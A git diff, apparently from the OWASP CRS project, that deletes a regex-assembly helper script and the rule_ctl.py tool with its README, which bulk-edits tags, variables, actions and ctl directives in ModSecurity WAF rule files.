-args = parser.parse_args()
-
-# Return the longest prefix of all list elements. Shamelessly copied from:
-# https://stackoverflow.com/questions/6718196/determine-the-common-prefix-of-multiple-strings
-def commonprefix(m):
-    "Given a list of pathnames, returns the longest common leading component"
-    if not m: return ''
-    s1 = min(m)
-    s2 = max(m)
-    for i, c in enumerate(s1):
-        if c != s2[i]:
-            return s1[:i]
-    return s1
-
-# flatten returns a string with concatenated dictionary keys
-def flatten(dict):
-    s = ""
-
-    for key in dict.keys():
-        s += key
-
-    return s
-
-# set returns a character set containing the unique characters across all strings for the given index
-def set(strings, index, flags):
-    dict = {}
-
-    for s in strings:
-        # Continue so we don't panic
-        if index > len(s) -1:
-            continue
-        
-        dict[s[index]] = ''
-    
-    return "[" + flags + flatten(dict) + "]"
-
-# prepare converts a string for negative lookaheads emulation
-def prepare(s, offset):
-    r = ""
-
-    if len(s) == 0:
-        return r
-
-    for i in range(offset, len(s)):
-        for j in range(0, i + 1):
-            if j == i:
-                r += "[^" + s[j] + "]"
-            else:
-                r += s[j]
-
-        if i != len(s) - 1:
-            r += "|"
-
-    return r
-
-# run runs the 
-def run():
-    strings = args.strings
-
-    r = ""
-    r += set(strings, 0, "^")
-
-    c = ""
-    d = {}
-
-    # Only find common string if we have more than one
-    if len(strings) > 1:
-        c = commonprefix(strings)
-        
-        # Collect all characters after the common substring from every string
-        for s in strings:
-            if len(s) > len(c) and s.startswith(c):
-                d[s[len(c)]] = ''
-
-    # Add the common string to the regex to prevent accidental matching
-    if len(c) > 0:
-        if len(c) > 1:
-            r += "|" +  "(?:" + prepare(c, 1) + ")"
-
-        r +=  "|" + "(?:" + c + "[^" + flatten(d) + "]" + ")"
-
-    for s in strings:
-        g = ""
-
-        # When the common string is > 0, offset with len(c) + 1 because we handled this earlier
-        if len(c) > 0:
-            g = prepare(s, len(c) + 1)
-        else:
-            g = prepare(s, 1)
-        
-        # Add OR boolean if necessary
-        if len(g) > 0:
-            r += "|"
-
-        r += g
-
-    print(args.prefix + "(?:" + r + ")" + args.suffix)
-
-# Only run if script is called directly
-if __name__ == "__main__":
-    run()
diff --git a/util/rule_ctl/README.md b/util/rule_ctl/README.md
deleted file mode 100644
index 374b37e17..000000000
--- a/util/rule_ctl/README.md
+++ /dev/null
@@ -1,135 +0,0 @@
-draft
-
-# OWASP CRS Rule Control Script
-This script aims to help when a bulk change on configuration files is needed. rule_ctl.py can, for example, change the value of an action on all rules, or can add/remove/rename a tag on each rule in a file, or can add/remove a transformation function only in rules that match range 942100-942190, etc...
-
-## Example Usage
-
-There're only two mandatory parameters: `--config` and `--filter-rule-id`.
-
-**--config** set the target config file<br>
-**--filter-rule-id** a regex that matches only rule ids to change
-
-For example, if you want to add a new tag on each rule in file `REQUEST-933-APPLICATION-ATTACK-PHP.conf` you can do:
-
-```sh
-python3 util/rule_ctl/rule_ctl.py \
-    --config rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf \
-    --filter-rule-id ^933.+ \
-    --append-tag foo
-    --dryrun
-```
-
-`--dryrun` sends to stdout the result of changes and prevent writing changes on file. It's a good idea to always check all commands with dryrun before overwrite the target configuration file.
-
-You can even alphabetically sort tag list while adding new tags:
-```sh
-python3 util/rule_ctl/rule_ctl.py \
-    --config rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf \
-    --filter-rule-id ^933.+ \
-    --append-tag foo
-    --sort-tag
-    --dryrun
-```
-
-## Variables
-- `--append-variable`: Append a variable on the variable list of selected rules
-- `--remove-variable`: Remove exact matching variable from selected rules
-- `--replace-variable`: Replace variable on selected rules
-
-### Examples
-Replace the variable name `ARGS` with `ARGS_GET`
-```sh
-python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
-    --filter-rule-id ^.\* \
-    --replace-variable ARGS,ARGS_GET \
-    --dryrun
-```
-
-Replace the variable `ARGS` with `!ARGS_GET:'lisa'`
-```sh
-python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
-    --filter-rule-id ^.\* \
-    --replace-variable ARGS,\!ARGS_GET:\'lisa\' \
-    --dryrun
-```
-
-## Tags
-- `--append-tag`: Append a new tag to the tag list on selected rules
-- `--remove-tag`: Remove tag from tag list on selected rules
-- `--rename-tag`: Rename tag on selected rules
-- `--sort-tags`: Alphabetically sort tag list on selected rules
-
-### Examples
-Append a new tag `foo` and sort tag list
-```sh
-python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
-    --filter-rule-id ^.\* \
-    --append-tag foo \
-    --sort-tags \
-    --dryrun
-```
-
-Remove a tag `foo`
-```sh
-python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
-    --filter-rule-id ^.\* \
-    --remove-tag foo \
-    --dryrun
-```
-
-Rename a tag `foo`
-```sh
-python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
-    --filter-rule-id ^.\* \
-    --rename-tag foo,bar \
-    --dryrun
-```
-
-## Transformation Functions
-- `--append-tfunc`: Append a new transformation function on selected rules
-- `--remove-tfunc`: Remove a transformation function on selected rules
-
-### Examples
-Append `t:lowercase` to all selected rules (you don't need the `t:` prefix)
-```sh
-python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
-    --filter-rule-id ^.\* \
-    --append-tfunc lowercase \
-    --dryrun
-```
-
-## Actions
-- `--replace-action`: Replace action on selected rules
-- `--remove-action`: remove action from selected rules
-
-### Examples
-Replace action `severity:CRITICAL` with `severity:INFO` and set a new message on rule id 125
-```sh
-python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
-    --filter-rule-id ^125 \
-    --replace-action severity:CRITICAL,severity:INFO \
-    --uncond-replace-action 'msg:this is a new message for rule 125' \
-    --dryrun
-```
-
-## CTL
-- `--append-ctl`: Append a new ctl action on selected rules
-
-### Examples
-Remove rule id 1337 on rule 125 by adding ctl:ruleRemoveById=1337. Do it on main rule (skipping chained rules if present)
-```sh
-python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
-    --filter-rule-id ^125 \
-    --append-ctl ruleRemoveById=1337 \
-    --skip-chain \
-    --dryrun
-```
-
-## Others
-- `--target-file`: Set the target file where changes will be saved (default: use file set by `--config`)
-- `--skip-chain`: Skip chained rules
-- `--dryrun`: Do not write any changes, just output the results
-- `--debug`: Show debug messages
-- `--silent`: Used with `--dryrun` and `--debug` doesn't write and shows only debug messages
-- `--json`: Used with `--dryrun` return the msc_pyparser JSON output instead of ModSecurity file
diff --git a/util/rule_ctl/pyproject.toml b/util/rule_ctl/pyproject.toml
deleted file mode 100644
index 77c7e6eff..000000000
--- a/util/rule_ctl/pyproject.toml
+++ /dev/null
@@ -1,5 +0,0 @@
-[tool.pytest.ini_options]
-minversion = "6.0"
-testpaths = [
-    "tests",
-]
diff --git a/util/rule_ctl/requirements.txt b/util/rule_ctl/requirements.txt
deleted file mode 100644
index 2e1b1f04f..000000000
--- a/util/rule_ctl/requirements.txt
+++ /dev/null
@@ -1,3 +0,0 @@
-argparse
-msc_pyparser
-pytest
diff --git a/util/rule_ctl/rule_ctl.py b/util/rule_ctl/rule_ctl.py
deleted file mode 100755
index afa4f155a..000000000
--- a/util/rule_ctl/rule_ctl.py
+++ /dev/null
@@ -1,801 +0,0 @@
-#! /usr/bin/env python
-
-import sys, re, json, uuid
-
-try:
-    import argparse, msc_pyparser
-except:
-    print(f"Error: missing modules.\nYou can install all dependences with: pip3 install -r requirements.txt")
-    sys.exit(1)
-
-ACTION_ORDER = {
-    key: index for index, key in enumerate(
-        [
-            "id",
-            "phase",
-            "allow",
-            "block",
-            "deny",
-            "drop",
-            "pass",
-            "proxy",
-            "redirect",
-            "status",
-            "capture",
-            "t",
-            "log",
-            "nolog",
-            "auditlog",
-            "noauditlog",
-            "msg",
-            "logdata",
-            "tag",
-            "sanitiseArg",
-            "sanitiseRequestHeader",
-            "sanitiseMatched",
-            "sanitiseMatchedBytes",
-            "ctl",
-            "ver",
-            "severity",
-            "multiMatch",
-            "initcol",
-            "setenv",
-            "setvar",
-            "expirevar",
-            "chain",
-            "skip",
-            "skipAfter"
-        ]
-    )
-}
-
-class Context(object):
-    def __init__(self):
-        self.args = ()
-        self.line_number_change = 0
-        self.next_index_to_parse = 0
-        self.parser = None
-        self._rules = []
-        self._rules_map = {}
-
-    def parse_rules(self, data):
-        mparser = msc_pyparser.MSCParser()
-        mparser.parser.parse(data, debug = False)
-
-        for line in mparser.configlines:
-            type = line["type"]
-            if type == "SecAction":
-                rule = SecAction(line, self)
-            elif type == "Comment":
-                rule = Comment(line, self)
-            elif type == "SecRule":
-                rule = SecRule(line, self)
-            else:
-                rule = Directive(line, self)
-
-            self._rules.append(rule)
-            if isinstance(rule, SecAction):
-                if rule.is_chained():
-                    self._rules_map[rule.id]['chained'].append(rule)
-                else:
-                    self._rules_map[rule.id] = {
-                        'rule': rule,
-                        'chained': []
-                    }
-            yield rule
-
-    def get_chain_starter_rule(self, rule):
-        try:
-            self._rules_map[rule.id]['rule']
-        except KeyError:
-            # Chained rules don't have ID during initialization.
-            # In this case, however, the last parsed rule now has one
-            return self._rules_map[self._rules[-1].id]['rule']
-
-    def dprint(self, rule_id, action, message, indent):
-        if not indent:
-            indent=0
-
-        prefix = "[*]"
-        if indent > 0:
-            prefix = "`"
-
-        if not rule_id:
-            rule_id = "chained"
-
-        print(f'{" "*int(indent)}{prefix} \033[92m{rule_id}/{action}\033[0m: {message}')
-
-    def generate_output(self):
-        mwriter = msc_pyparser.MSCWriter(self.generate_lines())
-        mwriter.generate()
-        return mwriter.output
-
-    def generate_lines(self):
-        generated_lines = []
-        line_number_change = 0
-        for rule in self._rules:
-            lines, line_number_change = rule.generate_lines(line_number_change)
-            generated_lines.append(lines)
-        return generated_lines
-
-    def parse_arguments(self, args=None):
-        args_parser = self._create_args_parser()
-        self.args = args_parser.parse_args(args)
-
-    def _create_args_parser(self):
-        parser = argparse.ArgumentParser(description="OWASP CRS Configuration Control")
-        parser.add_argument("--config", dest="config", help="OWASP ModSecurity CRS config file path", required=True)
-        parser.add_argument("--filter-rule-id", dest="filter_rule_id", help="Filter on ruleid (regex)", required=False)
-        parser.add_argument("--append-variable", dest="append_variable", help="Append var on SecRule (string)", action='append', required=False)
-        parser.add_argument("--remove-variable", dest="remove_variable", help="Remove var from SecRule (string)", action='append', required=False)
-        parser.add_argument("--replace-variable", dest="replace_variable", help="Replace var in SecRule (old,new) (string)", action='append', required=False)
-        parser.add_argument("--append-tag", dest="append_tag", help="Append tag on SecRule (string)", required=False)
-        parser.add_argument("--remove-tag", dest="remove_tag", help="Remove tag from SecRule (string)", required=False)
-        parser.add_argument("--rename-tag", dest="rename_tag", help="Rename tag on SecRule (old,new) (string)", required=False)
-        parser.add_argument("--sort-tags", dest="sort_tags", help="Sort tag list in SecRule", action="store_true", required=False)
-        parser.add_argument("--append-tfunc", dest="append_tfunc", help="Append transformation func on SecRule (example: urlDecodeUni) (string)", action='append', required=False)
-        parser.add_argument("--remove-tfunc", dest="remove_tfunc", help="Remove transformation func from SecRule (example: urlDecodeUni) (string)", action='append', required=False)
-        parser.add_argument("--append-action", dest="append_action", help="Append action on Secrule (example: 'severity:CRITICAL) (string)", required=False)
-        parser.add_argument("--replace-action", dest="replace_action", help="Replace action (example: 'severity:CRITICAL,severity:INFO') (string)", required=False)
-        parser.add_argument("--remove-action", dest="remove_action", help="Remove action from SecRule (string)", required=False)
-        parser.add_argument("--append-ctl", dest="append_ctl", help="Append ctl action on SecRule (example: 'ruleRemoveTargetById=1234;ARGS:passwd') (string)", required=False)
-        parser.add_argument("--target-file", dest="target_file", help="Save changes in another file (string)", required=False)
-        parser.add_argument("--skip-chain", dest="skip_chain", help="Skip chained rules", action="store_true", required=False)
-        parser.add_argument("--dryrun", dest="dryrun", help="Show changes without write", action="store_true", required=False)
-        parser.add_argument("--silent", dest="silent", help="Do not output content file on dryrun", action="store_true", required=False)
-        parser.add_argument("--debug", dest="debug", help="Show debug messages", action="store_true", required=False)
-        parser.add_argument("--json", dest="output_json", help="Get all output in JSON format", action="store_true", required=False)
-        return parser
-
-class RuleFileItem(object):
-    def __init__(self, data, context):
-        self._data = data
-        self._line_numbers = {"rule_line": data["lineno"]}
-
-    def modify(self, context):
-        pass
-
-    def generate_lines(self, line_number_change):
-        new_line_number_change = self._update_line_numbers(line_number_change)
-        return (self._data, new_line_number_change)
-
-    def _update_line_numbers(self, line_number_change):
-        self._data["lineno"] = self._line_numbers["rule_line"] + line_number_change
-
-        return line_number_change
-
-class SecAction(RuleFileItem):
-    TAG_RENAME_REGEX = re.compile('^([^,]+),(.+)$')
-    ACTION_REPLACE_REGEX = re.compile('^([^,]+),(.+)$')
-    ACTION_REPLACE_VALUES_REGEX = re.compile('^([^:]+)(?::(.+))?$')
-    CTL_APPEND_REGEX = re.compile('^([^=]+)=([^;]+)(;[^:]+:.+|)$')
-    CTL_APPEND_PARAMS_REGEX = re.compile('^;([^:]+):(.+)$')
-    id = None
-    _id_matcher = None
-
-    def __init__(self, data, context):
-        super().__init__(data, context)
-
-        for action in self.get_actions():
-            action["id"] = uuid.uuid4()
-            if action["act_name"] == "id":
-                self.id = int(action["act_arg"])
-                break
-
-        if "oplineno" in self._data:
-            self._line_numbers["opline"] = self._data["oplineno"]
-        for action in self.get_actions():
-            self._line_numbers[("action", uuid)] = action["lineno"]
-
-    def _parse_var(self, variable):
-        negated = False
-        counter = False
-        newvar = variable
-        newvarpart = ""
-        quote_type = "no_quote"
-        m = re.match('^([!&]?)([^:]+)(?::(.+))?$', variable)
-        if m:
-            counter = m.group(1) == '&'
-            negated = m.group(1) == '!'
-            newvar = m.group(2)
-            varpart = m.group(3)
-            if varpart is not None:
-                if varpart[0] == '"' and varpart[-1] == '"':
-                    quote_type = 'quoted'
-                    varpart = varpart[1:-1]
-                elif varpart[0] == "'" and varpart[-1] == "'":
-                    quote_type = 'quotes'
-                    varpart = varpart[1:-1]
-                newvarpart = varpart
-        return {
-            "variable": newvar,
-            "variable_part": newvarpart,
-            "quote_type": quote_type,
-            "negated": negated,
-            "counter": counter
-        }
-
-    def _is_equal_variable(self, variable1, variable2):
-        compare_fields = ("variable", "variable_part", "negated", "counter")
-        return all(variable1[field] == variable2[field] for field in compare_fields)
-
-    def _has_variable(self, variable):
-        for var in self.get_variables():
-            if self._is_equal_variable(variable, var):
-                return True
-        return False
-
-
-
-    def _update_line_numbers(self, line_number_change):
-        #TODO: doesn't yet work when order changes, e.g. variables and tags may not have been grouped together
-        super()._update_line_numbers(line_number_change)
-
-        first_line_number = last_line_number = self._data["lineno"]
-
-        if "oplineno" in self._data:
-            last_line_number = self._line_numbers["opline"] + line_number_change
-            self._data["oplineno"] = last_line_number
-
-
-        for action in self.get_actions():
-            try:
-                last_line_number = self._line_numbers[("action", action["id"])] + line_number_change
-                action["lineno"] = last_line_number
-            except KeyError:
-                # keep everything on one line if it already was
-                if any(lineno > self._line_numbers['rule_line'] for lineno in self._line_numbers.values()):
-                    last_line_number += 1
-                action["lineno"] = last_line_number
-
-        original_first_line_number = min(self._line_numbers.values())
-        original_last_line_number = max(self._line_numbers.values())
-        original_length = original_last_line_number - original_first_line_number
-        new_length = last_line_number - first_line_number
-        start_change = first_line_number - original_first_line_number
-        length_change = new_length - original_length
-        total_change = length_change + start_change
-        return total_change
-
-    def modify(self, context):
-        if context.args.filter_rule_id and not self.matches_id(context.args.filter_rule_id):
-            return
-
-        self.append_tag(context)
-        self.remove_tag(context)
-        self.rename_tag(context)
-        self.append_tfunc(context)
-        self.remove_tfunc(context)
-        self.append_action(context)
-        self.replace_action(context)
-        self.remove_action(context)
-        self.append_variables(context)
-        self.remove_variables(context)
-        self.replace_variables(context)
-        self.append_ctl(context)
-        self.sort_tags(context)
-
-    def get_actions(self):
-        try:
-            return self._data["actions"]
-        except KeyError:
-            return []
-
-    def set_actions(self, actions):
-        self._data["actions"] = actions
-
-    def get_variables(self):
-        try:
-            return self._data["variables"]
-        except KeyError:
-            return []
-
-    def set_variables(self, variables):
-        self._data["variables"] = variables
-
-    def get_tags(self):
-        return [action for action in self.get_actions() if action["act_name"] == "tag"]
-
-    def get_ctls(self):
-        return [action for action in self.get_actions() if action["act_name"] == "ctl"]
-
-    def matches_id(self, id_pattern):
-        if self._id_matcher is None:
-            self._id_matcher = re.compile(id_pattern)
-        return self._id_matcher.match(str(self.id)) != None
-
-    def append_tag(self, context):
-        if context.args.append_tag is None:
-            return
-
-        #TODO: support appending multiple tags
-        tags = self.get_tags()
-        if context.args.append_tag in [tag["act_arg"] for tag in tags]:
-            return
-
-        actions = self.get_actions()
-        new_act_list = []
-        last_tag_line = 0
-        tag_order = ACTION_ORDER["tag"]
-        new_tag = {
-            'id': uuid.uuid4(),
-            'act_name': 'tag',
-            'lineno': 0,
-            'act_quote': 'quotes',
-            'act_arg': context.args.append_tag,
-            'act_arg_val': '',
-            'act_arg_val_param': '',
-            'act_arg_val_param_val': ''
-        }
-
-        done = False
-        last_action_index = len(actions) - 1
-        for index, action in enumerate(actions):
-            action_name = action["act_name"]
-            action_order = ACTION_ORDER[action_name]
-            if action_order <= tag_order:
-                last_tag_line = action["lineno"]
-                new_act_list.append(action)
-            if not done and (action_order > tag_order or index == last_action_index):
-                done = True
-                new_act_list.append(new_tag)
-                if context.args.debug:
-                    context.dprint(self.id, "append-tag", f"append tag {context.args.append_tag} on line {last_tag_line}", 0)
-            if action_order > tag_order:
-                new_act_list.append(action)
-        self.set_actions(new_act_list)
-
-    def remove_tag(self, context):
-        if context.args.remove_tag is None:
-            return
-
-        #TODO: support removing multiple tags
-        actions = self.get_actions()
-        new_act_list = []
-        for action in actions:
-            if action["act_name"] == "tag":
-                if action["act_arg"] != context.args.remove_tag:
-                    new_act_list.append(action)
-                else:
-                    if context.args.debug:
-                        context.dprint(self.id, "remove-tag", f"remove tag {context.args.remove_tag} on line {action['lineno']}", 0)
-            else:
-                new_act_list.append(action)
-
-        self.set_actions(new_act_list)
-
-    def rename_tag(self, context):
-        if context.args.rename_tag is None:
-            return
-
-        match = self.TAG_RENAME_REGEX.match(context.args.rename_tag)
-        if match is None:
-            return
-
-        old_tag = match.group(1)
-        new_tag = match.group(2)
-        new_act_list = []
-        for act in self.get_actions():
-            if act["act_name"] == "id":
-                current_rule_id = act["act_arg"]
-            if act["act_name"] == "tag":
-                if act["act_arg"] == old_tag:
-                    act["act_arg"] = new_tag
-                    if context.args.debug:
-                        context.dprint(current_rule_id, "rename-tag", f"rename tag {old_tag} to {new_tag} on line {act['lineno']}", 0)
-                new_act_list.append(act)
-            else:
-                new_act_list.append(act)
-        self.set_actions(new_act_list)
-
-    def append_action(self, context):
-        if context.args.append_action is None:
-            return
-
-        match = self.ACTION_REPLACE_VALUES_REGEX.match(context.args.append_action)
-        if match is None:
-            return
-
-        new_action_name = match.group(1)
-        new_action_value = match.group(2) or ""
-
-        #TODO: support appending multiple actions
-        actions = self.get_actions()
-        if (
-            new_action_name in [action["act_name"] for action in actions] and
-            new_action_value in [action["act_arg"] for action in actions]
-        ):
-            return
-
-        new_act_list = []
-        last_action_line = 0
-        new_action_order = ACTION_ORDER[new_action_name]
-        has_quotes = len(new_action_value) > 0 and new_action_value[0] in '"\'' and new_action_value[-1] in '"\''
-        if has_quotes:
-            new_action_value = new_action_value[1:-1]
-        new_action = {
-            'id': uuid.uuid4(),
-            'act_name': new_action_name,
-            'lineno': 0,
-            'act_quote': 'quotes' if has_quotes else 'no_quote',
-            'act_arg': new_action_value,
-            'act_arg_val': '',
-            'act_arg_val_param': '',
-            'act_arg_val_param_val': ''
-        }
-
-        done = False
-        last_action_index = len(actions) - 1
-        for index, action in enumerate(actions):
-            action_name = action["act_name"]
-            action_order = ACTION_ORDER[action_name]
-            if action_order <= new_action_order:
-                last_action_line = action["lineno"]
-                new_act_list.append(action)
-            if not done and (action_order > new_action_order or index == last_action_index):
-                done = True
-                new_act_list.append(new_action)
-                if context.args.debug:
-                    context.dprint(self.id, "append-action", f"append action {context.args.append_action} on line {last_action_line}", 0)
-            if action_order > new_action_order:
-                new_act_list.append(action)
-
-        if len(new_act_list) == 0:
-            new_act_list.append(new_action)
-
-        self.set_actions(new_act_list)
-
-
-
-    def replace_action(self, context):
-        if context.args.replace_action is None:
-            return
-
-        match = self.ACTION_REPLACE_REGEX.match(context.args.replace_action)
-        if match is None:
-            return
-
-        from_string = match.group(1)
-        to_string = match.group(2)
-        from_match = self.ACTION_REPLACE_VALUES_REGEX.match(from_string)
-        to_match = self.ACTION_REPLACE_VALUES_REGEX.match(to_string)
-        if from_match is None or to_match is None:
-            return
-
-        from_actname = from_match.group(1)
-        from_actvalue = from_match.group(2) or ""
-        to_actname = to_match.group(1)
-        to_actvalue = to_match.group(2) or ""
-        has_quotes = len(to_actvalue) > 0 and to_actvalue[0] in '"\'' and to_actvalue[-1] in '"\''
-        if has_quotes:
-            to_actvalue = to_actvalue[1:-1]
-
-        for act in self.get_actions():
-            if act["act_name"] == from_actname:
-                # match all actions of the specified name if `from_actvalue` is empty
-                if len(from_actvalue) == 0 or act["act_arg"] == from_actvalue:
-                    act["act_name"] = to_actname
-                    act["act_arg"] = to_actvalue
-                    act["act_quote"] = "quotes" if has_quotes else "no_quote"
-
-    def remove_action(self, context):
-        if context.args.remove_action is None:
-            return
-
-        actions = self.get_actions()
-        new_act_list = []
-        for action in actions:
-            if action["act_name"] != context.args.remove_action:
-                new_act_list.append(action)
-
-        self.set_actions(new_act_list)
-
-    def append_tfunc(self, context):
-        if context.args.append_tfunc is None:
-            return
-
-        transform_order = ACTION_ORDER["t"]
-        actions = self.get_actions()
-        last_action_index = len(actions) - 1
-        transformation_names = [action["act_arg"] for action in actions if action["act_name"] == "t"]
-
-        for tfunc in context.args.append_tfunc:
-            if tfunc in transformation_names:
-                continue
-
-            new_act_list = []
-            done = False
-            last_lineno = 0
-            for index, act in enumerate(actions):
-                action_name = act["act_name"]
-                action_order = ACTION_ORDER[action_name]
-                if action_order <= transform_order:
-                    last_lineno = act["lineno"]
-                    new_act_list.append(act)
-                if not done and (action_order > transform_order or index == last_action_index):
-                    done = True
-                    new_act_list.append({
-                        'id': uuid.uuid4(),
-                        'act_name': 't',
-                        'lineno': last_lineno,
-                        'act_quote': 'no_quote',
-                        'act_arg': tfunc,
-                        'act_arg_val': '',
-                        'act_arg_val_param': '',
-                        'act_arg_val_param_val': ''
-                    })
-                    if context.args.debug:
-                        context.dprint(self.id, "append-tfunc", f"append transformation {context.args.append_tfunc} on line {last_lineno}", 0)
-                if action_order > transform_order:
-                    new_act_list.append(act)
-            actions = new_act_list
-
-        self.set_actions(actions)
-
-
-    def remove_tfunc(self, context):
-        if context.args.remove_tfunc is None:
-            return
-
-        actions = self.get_actions()
-        for tfunc in context.args.remove_tfunc:
-            new_act_list = []
-            for act in actions:
-                if act["act_name"] == "t":
-                    if act["act_arg"] != tfunc:
-                        new_act_list.append(act)
-                else:
-                    new_act_list.append(act)
-            actions = new_act_list
-
-        self.set_actions(actions)
-
-
-    def append_variables(self, context):
-        if context.args.append_variable is None:
-            return
-
-        variables = self.get_variables()
-        for nv in context.args.append_variable:
-            newvar = self._parse_var(nv)
-            if self._has_variable(newvar):
-                continue
-
-            new_var_list = []
-            for v in variables:
-                new_var_list.append(v)
-            new_var_list.append({
-                "variable": newvar["variable"],
-                "variable_part": newvar["variable_part"],
-                "quote_type": "no_quote",
-                "negated": newvar["negated"],
-                "counter": newvar["counter"]
-            })
-            if context.args.debug:
-                context.dprint(self.id, "append-variable", f"Append variable {newvar}:{newvar['variable_part']}", 0)
-            variables = new_var_list
-
-        self.set_variables(variables)
-
-
-    def remove_variables(self, context):
-        if context.args.remove_variable is None:
-            return
-
-        variables = self.get_variables()
-        for nv in context.args.remove_variable:
-            var = self._parse_var(nv)
-            if not self._has_variable(var):
-                continue
-
-            new_var_list = []
-            for v in variables:
-                if not self._is_equal_variable(var, v):
-                    new_var_list.append(v)
-                else:
-                    if context.args.debug:
-                        varpart = var["variable_part"]
-                        negated = var["negated"]
-                        counter = var["counter"]
-                        context.dprint(self.id, "remove-variable", f"Removed variable {var}:{varpart} negated:{negated} counter:{counter}", 0)
-            variables = new_var_list
-        self.set_variables(variables)
-
-
-    def replace_variables(self, context):
-        if context.args.replace_variable is None:
-            return
-
-        variables = self.get_variables()
-        for nv_tosplit in context.args.replace_variable:
-            oldvar, newvar = nv_tosplit.split(",")
-            ov = self._parse_var(oldvar)
-            nv = self._parse_var(newvar)
-
-            new_variable = nv["variable"]
-            newvarpart = nv["variable_part"]
-            newnegated = nv["negated"]
-            newcounter = nv["counter"]
-            newquotetype = nv["quote_type"]
-            old_variable = ov["variable"]
-            oldvarpart = ov["variable_part"]
-            oldnegated = ov["negated"]
-            oldcounter = ov["counter"]
-            oldquotetype = ov["quote_type"]
-            new_var_list = []
-            for v in variables:
-                if (v["variable"] == old_variable and v["variable_part"] == oldvarpart
-                        and v["negated"] == oldnegated and v["counter"] == oldcounter and v["quote_type"] == oldquotetype):
-                    new_var_list.append({
-                        "variable": new_variable,
-                        "variable_part": newvarpart,
-                        "quote_type": newquotetype,
-                        "negated": newnegated,
-                        "counter": newcounter
-                    })
-                    if context.args.debug:
-                        context.dprint(self.id, "replace-variable", f"Replaced variable {oldvar}:{oldvarpart} negated:{oldnegated} counter:{oldcounter} quote_type:{oldquotetype} with {newvar}:{newvarpart} negated:{newnegated} counter:{newcounter} quote_type:{newquotetype}", 0)
-                else:
-                    new_var_list.append(v)
-            variables = new_var_list
-
-        self.set_variables(variables)
-
-    def append_ctl(self, context):
-        # TODO: support appending multiple ctl
-        if context.args.append_ctl is None:
-            return
-
-        match = self.CTL_APPEND_REGEX.match(context.args.append_ctl)
-        if match is None:
-            return
-
-        arg = match.group(1)
-        if arg.startswith('ctl:'):
-            arg = arg[4:]
-        val = match.group(2)
-
-        params = self.CTL_APPEND_PARAMS_REGEX.match(match.group(3))
-        param = params.group(1) if params is not None else ""
-        paramval = params.group(2) if params is not None else ""
-
-        ctls = self.get_ctls()
-        if (
-            arg in [ctl["act_arg"] for ctl in ctls] and
-            val in [ctl["act_arg_val"] for ctl in ctls] and
-            param in [ctl["act_arg_val_param"] for ctl in ctls] and
-            paramval in [ctl["act_arg_val_param_val"] for ctl in ctls]
-        ):
-            return
-
-        actions = self.get_actions()
-        new_act_list = []
-        last_ctl_line = 0
-        ctl_order = ACTION_ORDER["ctl"]
-        new_ctl = {
-            "id": uuid.uuid4(),
-            "act_name": "ctl",
-            "lineno": last_ctl_line,
-            "act_quote": "no_quote",
-            "act_arg": arg,
-            "act_arg_val": val,
-            "act_arg_val_param": param,
-            "act_arg_val_param_val": paramval
-        }
-
-        done = False
-        last_action_index = len(actions) - 1
-        for index, action in enumerate(actions):
-            action_name = action["act_name"]
-            action_order = ACTION_ORDER[action_name]
-            if action_order <= ctl_order:
-                last_ctl_line = action["lineno"]
-                new_act_list.append(action)
-            if not done and (action_order > ctl_order or index == last_action_index):
-                done = True
-                new_act_list.append(new_ctl)
-                if context.args.debug:
-                    context.dprint(self.id, "append-ctl", f"append ctl {context.args.append_ctl} on line {last_ctl_line}", 0)
-            if action_order > ctl_order:
-                new_act_list.append(action)
-
-        if len(new_act_list) == 0:
-            new_act_list.append(new_ctl)
-
-        self.set_actions(new_act_list)
-
-
-    def sort_tags(self, context):
-        #TODO: tags don't need to be grouped together; need to look through all actions
-        if not context.args.sort_tags:
-            return
-
-        new_act_list = []
-        post_tag_actions = []
-        tags = []
-        last_lineno = None
-        found_tag = False
-        for act in self.get_actions():
-            if act["act_name"] == "tag":
-                tags.append(act)
-                found_tag = True
-                if last_lineno is None:
-                    first_lineno = act["lineno"]
-            elif not found_tag:
-                new_act_list.append(act)
-            elif found_tag:
-                post_tag_actions.append(act)
-
-        def get_sort_key(tag):
-            return tag["act_arg"].lower()
-
-        sorted_tags = sorted(tags, key=get_sort_key)
-        for tag in sorted_tags:
-            new_act_list.append(tag)
-            tag["lineno"] = first_lineno
-            first_lineno += 1
-
-        for act in post_tag_actions:
-            new_act_list.append(act)
-
-        self.set_actions(new_act_list)
-
-class Comment(RuleFileItem):
-    pass
-
-class Directive(RuleFileItem):
-    pass
-
-class SecRule(SecAction):
-    _is_chained = False
-
-    def __init__(self, data, context):
-        super().__init__(data, context)
-
-        # for chained rules (they have no ID)
-        if self.id is None:
-            self.id = context.get_chain_starter_rule(self).id
-            self._is_chained = True
-
-    def has_chained_rules(self):
-        return self._data["chained"]
-
-    def is_chained(self):
-        return self._is_chained
-
-    def modify(self, context):
-        if context.args.skip_chain and self.is_chained():
-            return
-
-        super().modify(context)
-
-
-def write_output(context):
-    if context.args.dryrun and context.args.output_json:
-        print(json.dumps(context.generate_lines(), indent=4))
-        return
-
-    if context.args.dryrun:
-        if not context.args.silent:
-            print("\n".join(context.generate_output()))
-        return
-
-    path = context.args.target_file if context.args.target_file else context.args.config
-    with open(path, 'w') as handle:
-        handle.write("\n".join(context.generate_output()))
-
-
-def run():
-    context = Context()
-    context.parse_arguments()
-
-    with open(context.args.config) as file:
-        data = file.read()
-
-    for rule in context.parse_rules(data):
-        rule.modify(context)
-
-    write_output(context)
-
-if __name__ == '__main__':
-    run()
diff --git a/util/rule_ctl/tests/__init__.py b/util/rule_ctl/tests/__init__.py
deleted file mode 100644
index e69de29bb..000000000
diff --git a/util/rule_ctl/tests/helpers.py b/util/rule_ctl/tests/helpers.py
deleted file mode 100644
index 52829f2b3..000000000
--- a/util/rule_ctl/tests/helpers.py
+++ /dev/null
